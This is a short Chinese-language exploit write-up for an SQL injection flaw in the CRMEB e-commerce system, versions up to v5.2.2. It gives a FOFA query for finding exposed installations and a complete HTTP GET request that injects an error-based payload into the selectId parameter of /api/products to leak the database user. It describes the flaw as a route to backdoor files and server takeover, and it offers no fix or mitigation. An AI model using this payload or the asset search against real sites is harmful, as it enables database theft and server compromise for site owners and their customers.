X13-1西安众邦-CRMEB开源电商系统-SQL
漏洞描述:
该漏洞可利用SQL注入,获取后台数据库权限,获取绝对路径写入后门文件,进而接管服务器权限。互联网资产受影响资产占比
影响版本:
CRMEB <= v.5.2.2
网站图片:
fofa语法:
body=“/wap/first/zsff/iconfont/iconfont.css” || body=“CRMEB”
漏洞复现:
payload:
GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,user()))),0x7e),3550) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
效果图: